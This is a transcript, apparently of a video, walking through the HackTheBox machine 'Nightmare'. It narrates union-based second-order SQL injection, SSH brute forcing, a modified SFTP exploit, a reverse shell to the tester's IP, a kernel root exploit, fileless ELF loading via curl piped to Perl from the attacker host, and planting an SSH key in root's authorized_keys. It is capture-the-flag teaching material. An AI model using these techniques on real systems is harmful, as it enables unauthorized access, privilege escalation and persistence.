What's going on YouTube? This is Ipsec, and this video is going to be a bit odd. This is the second video we did on Nightmare, and the first one is 2.5 hours long. So after I recorded that, I was like, you know what? Someone may not want to watch 2.5 hours to see this box. So I created a speedrun video of me just going through it very quickly without too much talking. I kind of explain my mindset, but don't go in depth. So we could complete this box in like 20 minutes. Then when I was watching it over, I just didn't like it, so I wasn't going to upload this at all until I saw the two unintended solutions for this box that I just decided, you know what, I'm going to add to the end of the speedrun, add the unintended solutions, and then we'll have another good video. So the two unintended solutions, the first one is really cool. It comes from Mubix, and it's a way to execute ELF binaries in memory without touching disk. So it's kind of like the reflective loading on Windows. And then the second one is if you crash a process, it creates a crash dump essentially that you can write to and execute. So create the crash dump, take advantage of the permissions the file gets created with to drop a binary there and then execute it. So yeah, let's just jump in. Running nmap, we can see that we have two ports open, Apache on 80 and SSH on 2222. Apache's running 2418 on Ubuntu, so this is most likely going to be Xennial. And SSH has a weird flag with not so recent version in and 32-bit, so that is hinting at exploiting SSH. Apache's easier to exploit, so I'm going to go that first. We can try registering a user and put a bunch of weird things in, so that's testing cross-site scripting, and then put a bunch of random characters in that. We can do it on both fields. Logging in. We can see a SQL error, and this is just below the select document to upload. This would show all the documents uploaded or notes taken, so most likely this is in the username field since you got to select something from select star where username equals something. So let's register a user. Let's test this out. Let's do a single quote, and then that. We can just put the password as A. Always make sure to copy the username to make logging in easy. And I wish I'd stopped clicking that little warning. Still have that SQL error, so let's try registering something a little bit different. Register in, log in, and we don't have that SQL error anymore. So we can log out and play with union injection. Let's see. And we can do select. It's probably going to be like note name and note description or something. So we'll do union select 1, 2. Register, log in. We see this is SQL injectable. So this is going to be a second order SQL injection. Let us dump all the tables. So we can do something like union select table schema. Looks like that is capped on the number of characters, so let's send this to boot. Register. Repeater. Let's URL encode this so it makes sense to us. And table schema, table name, column name, from information schema dot columns. Don't forget the comment. And we have 3 different fields here, and then union select only supports 2, so let's concat this. And we can add a delimiter. And then we just need another field, so please subscribe. Close off the concat, send this in, and let us log in. I accidentally went to register again. Repeater is on. We'll just turn intercept off. Log in. And we have dumped the database, so we can just copy this all to a text file. Actually, no, we see what we want. Sysadmin with user and password. And this is the user's table. These are the two columns. So let us log in. Or not log in, but do another SQL injection. L1 burp. Repeater. We can do username, password. Don't need that third field. And this is from sysadmin.users. Create this account. Copy. Log in. We have to kill this PHP. Oh, we already logged out. So there we go. That PHP session was logged in, so it couldn't register an account. But when we click log out, that was fine. So let's copy all this, create a word list. We'll grep for the delimiter we use, which is colon on temp to user pass.text. We can pass this to Hydra now, so Hydra-C, user pass.text, SSH 10.10.10.66.2222. Get an account, try to log into this, so SSH-P, FTP user at 10.10.10.66, at where you go. Failed. It's FTP, so let's try SFTP on port dash capital P. They change those flags. We get connected, and we're at the root. So if we just Google SFTP Exploit, get a full disclosure post. Can copy this all. Exit. Vim sftp.c. Set paste. We see right here, mini ROP pop RDI. This is 32-bit based upon the banner, so we have to convert this into 32-bit. Which means the very first thing is going to be remote system address. Then we have nops. Then we have the stack start address. And have to convert all 64-bit references to 32-bit, so that SFTP seek 64. So any other 64s there. There's another one. Okay. Long. We don't want that. We want that to be integer. And let's see. We want size t to be an unsigned int. And we want size t to also be unsigned int. And that was my phone. I forgot to put that on mute. My bad. Unsigned int. Okay, let's see if this compiles. Oh, we have to get compile instructions. I forget the flags. So we can go to another exploit that is similar. And we have compile instructions here. Does compile, and I did realize I forgot one thing. We have to make a port because this defaults to port 2222. So let's see. This will be int target port is equal to ASCII to integer 2222. Change this. Okay. Compile. Failed. I forgot that last time too when I did this the first time. And okay. And then let us chmod plus x SSH exploit. Okay, we need to grab a shell, so and test monkey verse shell cheat sheet. Grab this. Use Python because we don't have write access to the server. And we just want to replace all double quotes with / double quote. That'll do it. And our IP address, which is 10.10.14.30. Use port 443. Got tempo. Copy. I missed copy. SSH exploit, so / SSH exploit 10.10.10.66 FTP user, and paste the code. Have netcat listen. Put the password in. Unable to find stack. So we forgot one thing to do in the exploit. I think that is LX to just X. GCC. Okay, got the shell. We can do find that -per -2000 for GID binaries and do dev null. We actually want slash. And we want slash, so dot's fine. Find dot -perm -2000. I think I did 200. Nope. Let's see. Maybe it's... Oh, well, the binary we want is here, SLS. That is not normally in the bin, so not sure if I did that wrong or right, but we'll just move on. Let's NC 10.10.14.30, that binary. NC LVNP 80 SLS, already in use. I think Burp's using it. Disable that. NC 10.10.14.30 80. Got it. Raider 2. Analyze. Look at the function. Comparing against 1. This looks like a loop. Going down, we have comparing against dash. And we have -b. So there is a argument there. Additionally, all these look like bad characters, so it's doing some type of bad character filter. Going down after the loop, we do have a system call, and tracing the system call up, we have it comparing against this variable that is, whoa, right to the left here. Raider screwed up. Let's see, where was that? Right here. So something sets it. It was that -b. If we go up here, -b sets that. And then just before that, you have a check for a new line, which is a bad character not in the bad character list. So let us try exploiting it. Go to reverse shell. User bin SLS -b. Single quote bin bash. Bin sh, I think is symlink to bin dash, or we'll just do bin dash. Bin bash normally draws permissions. ID, we're now decoder. And we can go into test and touch files. So we can do a uname-a, grab the kernel version, search it with privesc, and we'll put Ubuntu in the search. This has it actually in the description, so we can go to raw. Let's compile this. Do it on box because GCC isn't on the box there, so v kernel.c, set paste, paste it in, gcc -o pwn, base64 pwn, so we can copy this. Getting the line, search for root. Oh, that didn't copy everything. I thought it would. Copy everything. Go back to a shell. Vim c.b64. That didn't work well. Run the shell again. Run the exploit again. We'll do Python to get a TTY. Python-c, import pty, pt. I thought I did that right. Oh, I have single quotes twice. Vim t.b64. I don't think I have right access where I'm at. pwd. I do have right access, I think. Nope, I did bin bash on my tty. Python-c. Import pty, pty.spawn, bin sh, vim t.b64. That looks better. Hey, it. Let's just curl this. Python c m simple HTTP server on port 80. And that is 2 t.b64. Curl 10, 10, 14, 30, 80 slash t.b64 2 t.b64. And we even have to base64 encode it since we're curling it, but oh well. It's called pwn. Sometimes it's hard to go fast, actually. 10, 10, 14, 30, pwn. We'll do -o first. I don't know if this has been reset since I last did it on the video, so I'll do -o. Curl it. chmod plus x pwn. chmod plus x doesn't exist. So pwn does exist, so that's why I did pwn2. /pwn2. Kernel version not recognized. Looking at it, pulls it from LSB release, catting, etc LSB release. And we have that being changed, so let's just Google Ubuntu Xennial LSB release. And we'll grab an example file. Do it to please sub. I think this needs a double quote. We can curl that 10, 10, 14, 30, please sub to please sub, cat please sub, that exists. So let's modify the kernel, and we'll do LSB release to please sub, GCC again, curl -l parent 3, and then chmod plus x parent 3, run it. I forgot one modification. So please sub is actually in home decoder test. Please sub. Looking at that, Etsy shouldn't be there. So it made 3 modifications. So let's just fix that. Okay. And the final time to copy this over, hopefully. Curl 10, 10, 14, 30. Pwn to pwn 4. Right, failed because of set groups. If we look, we have a set GID already set, so let's go back to www data or FTP user. Go there, pwn 4, and we are root. And that is the box. So hope you enjoyed the speed run, and maybe that convinces you to watch that 2.5 hour video. Apologies for that sloppy cut. After recording the video, I saw 2 really cool ways to do the Nightmare machine without having to do the SLS binary. The very first one is my favorite. It allows you to execute ELF without touching disk. I saw this on Mubix's stream last night. That's MUBIX. He does Twitch streams probably once or twice a week. So we're going to do that one first and then go into one that was posted on the HackTheBox forum about creating a crash dump which gets chmodded to 777 so that you can edit that file with the binary and then execute it. I like the in-memory ELF more because it has more application on machines, because most machines you have write access somewhere, so creating that crash dump isn't really buying you anything except in this weird CTF issue. Doing this for a memory is just really cool in general because it bypasses the need to use like tempfs such as dev shm. So the very first thing to do is Google in-memory only ELF execution, and it should be the very first blog post. I'll put it in the comments in the video. It'll go below the timestamps, and you can essentially read this whole thing, but we're going to take 2 things out of this. We're going to grab, I think it's that Perl command. Nope, right here. We're going to grab this Perl command, and what this is going to do is give you a bunch of lines that look like this. So let us go here, and we're going to create a file elf-prep.sh, and I've already created this. All I did was paste the command I got, replace ./elf binary with the very first argument. So when you run this on a file, let's see, do I have elf? We have pwn in here, so we'll do bash elf-prep pwn, and all that's going to do is print a bunch of hex so we can load that into memory. The second thing, it's going to involve some typing. I know people are going to want me to post it to GitHub, but I mean, you'll learn a lot more if you just type it yourself. But go all the way down here, and you have the other pieces of a script. He probably has it somewhere else, but I saw in this ASCII stream, and you can try to copy and paste out of this. It didn't work too well for me. But you can see the code's here. I created both of those files. We have elf elf_load_pl.head, and this is just going to set it up so we can execute something out of memory. Then we have elf_load_pl.tail, and this is just going to actually execute it. So we're executing, and then this is going to be what you see in the PS output. Please subscribe. So in order to make this work, you have to do the elf prep pwn, and we'll put this to elf_load_pl.body, and then you can cat elf_load_pl_head, elf_load_pl_body, and elf_load_pl_tail to elf_load_pl. This isn't going to work right away because Nightmare did get reverted since I did the video, and that whole kernel check thing isn't going to be there. Additionally, that did require us getting to Nightmare privileges to begin with to be able to place that LSB release file of a Xennial machine somewhere else. So we're going to redo the whole kernel exploit. So let's vim pwn.c, and we can go over here. This is just the exploit code I had pulled earlier in the video. Let's paste this in. I forgot to do set paste. And we have to make this flag on our kernel, because we now can't just create our own LSB release file. So what we're going to do is, let's see, find what flags, whatchamacallit, Xennial, and just change that to Blade Runner. So right here we have, let's see, needle length, get distro. That's reading LSB release. That's out of band execute. Here we go. Going to take, that's weird. Okay, I'll ignore that. 1, 2, 3, 4. Take those 4 lines. And we're going to say if string comparison is equal to Blade Runner. And it's a 4.8 kernel, I believe. And going up here, let's just search Xennial now. We can take this kernel, the 480-58. This is the kernel we are on. And we're going to replace Xennial with Blade Runner, because that's what it's been renamed to. So we can copy compile pwn.c into pwn and redo our elf thing. So elf prep, let's see, dash elf prep.sh pwn into the body. We can cat this. If we look at elf_load_pl, we have that head file, we have it loading the binary into memory, and then executing it. So we can load the simple web server, Python HTTP simple HTTP server 80, nc lvnp, nope, do the shell up here, and then the SSH exploit thing from earlier, the password at where you go. And we get a shell. And this is the user that doesn't have write access anywhere. So we can just do curl. Oh, I forgot something. We're going to have to edit the C code a little more. So 10.10.14.30 slash what we call it, elf_load_pl. Okay, that works. Cat curl 10.10.14.30 elf_load_pl, and just pipe that over into Perl. And we were Nightmare, root, and then it exited right away. So let's see. How can we get that to stay around? And I'm actually not sure how to do it that way. Maybe, because the trick is we have to use curl, pipe it to Perl, and then get that TTY to stay. There may be something we can do within elf_load to do that. I'm not sure. Maybe if we just, hold on, whoops. And yeah, I'm not sure. We're going to edit the exploit again. So vim pern.c, and we're going to go to the exploit. And I forget what it is. Get root, maybe? Let's see. It's calling bash. So let's just search for bash. And here we have the exec shell. And I tried playing around with this to do like a Python shell, but it's in a very odd network state. So if we did like /sbin ifconfig and then ens33, let's see, gcc python. So we do ifconfig here, we see it is ens33, and if we do the curl elfload.pl, gcc bash elf prep, then next one was cat everything. I should make that into a single script. Curl 10.10.14.30 elfload.pl perl. Device not found. We're in a odd sandbox that I couldn't get network connection working from. So if we edit this exploit again, ens33, change that to loopback. Let's see. Compile, prep, cat, Python, girl. I can just copy it from up here. Look at the receive and transmit packets. Everything is 0. If I just do ifconfig ll, we see a bunch of stuff. So it's in an odd sandbox, so even if I just listened on loopback port 8000, it doesn't make the connection to me. So I did what Mubix did, and that is just write a file to disk, that file being the SSH authorized key file. So let's cat root. We can just use SSH keygen. We don't have to use our own. File to save, we'll do root HTTP boxes nightmare please sub. Okay, so if we cat please sub dot public, we can grab this SSH key and then edit the exploit for one final time. So now we're looking for sbin ifconfig. This exists in a function called setting up sandbox, or setup sandbox. Exec shell. So we're going to get rid of this code and do char key is equal to our SSH key. We don't have to have that, but oh well. Leave that there. Then we can do file fp is equal to fopen root SSH authorized keys. Open that for writing, and I think this is going to delete the whole file every time. So we could do append, but let's just be noisy and erase the file if it exists. And then fprintf fp the string, new line, or key, and that should be it. We should close the file. Close fp. So now we're just writing our SSH key to the disk, and if it does write, then we'll be able to just SSH in. So compile it, prep it, combine head, body, and tail, and then start a web server. So we can do curl 10.10.14.30 elfload.pl perl, and it says it got root. And let's see, we close out of here, ssh-i, we have to chmod it. Chmod 600, please sub. ssh-i, please sub. I have 2 files, please sub. I think that's the correct one. Make that bigger. -p 2222. Then IP address of Nightmare, which is 10.10.10.66. And we are root. So we're going to erase that key and then do it again. So rm.ssh authorize keys. And we can just touch it. Authorized keys. So if we look at that file, completely empty. So the next way to do this box, and look, we are still FTP user, we can't get into root, is if we go to forum.hackthebox.org, EU. I don't know why I said org. Forum.hackthebox.eu, and go to search. Search for Nightmare. We got a very good write-up by 0xEA31. And essentially, when a process creates a core dump, it's going to be chmod to 777. And there's a whole description below exactly why that is. If you want, you can read it, but we're just going to do it. So, it says sleep 60 and then you do pgrep on the FTP user. Oh, -l. pgrep-u FTP user-l. And then we can kill it with 1590, because that tells it to create a core dump. 1590 1681. Was it kill? Oh, 11. Kill-11 1681. Can't read. So now it should have a crash dump and var crash. We see this lock file is chmod to 777, so we can write anything we want. So please sub to, we can actually write to the binsleep.crash file as well. So if we cat.lock now, we can write to it. So the step is to curl 10.10.14.30. We'll just do pern -o .lock. Python. Copy this. And if we do ls-la now, .lock is pretty big, and it's an ELF object. So let's SSH again. We can't. It's going to ask us for a password. And now we can just execute .lock. And now when we SSH, it lets us in. So those are the 2 ways to do it through not fooling around with SLS. Hope you guys enjoyed this, and I'll see you next week.